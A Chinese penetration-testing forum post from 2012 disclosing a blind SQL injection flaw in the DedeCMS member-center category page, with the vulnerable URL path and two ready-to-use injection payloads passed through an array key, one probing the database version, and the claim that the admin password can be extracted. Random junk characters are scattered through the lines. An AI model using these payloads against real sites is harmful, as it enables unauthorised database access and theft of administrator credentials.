中国网络渗透测试联盟

标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 [打印本页]

作者: admin    时间: 2012-12-20 08:08
标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.- d. K  |4 L. c9 u
+ s0 O. E3 ?# x6 J
! J& g2 [7 b% T5 x# C; B
发生在数组key里的注射漏洞,有点意思.
% z% X. J9 z' \  c 1 v- W$ @, y& |% W/ N6 g+ a5 ~$ ?6 y
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下* z1 f* b( V8 n) S

3 D7 x+ E* Q% n& Ghttp://www.xxx.com /dede/member/mtypes.php?dopost=save$ W# @$ j# Q& v

( r; Z- w& o& j5 v# c/ L! rexploit:5 e9 M  N3 b4 m& N. G1 j
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
/ n2 q5 E- s, q, ?+ ^+ s7 L4 C/ j1 Gmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
) u4 N. V' {, f/ H* T) L+ w




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2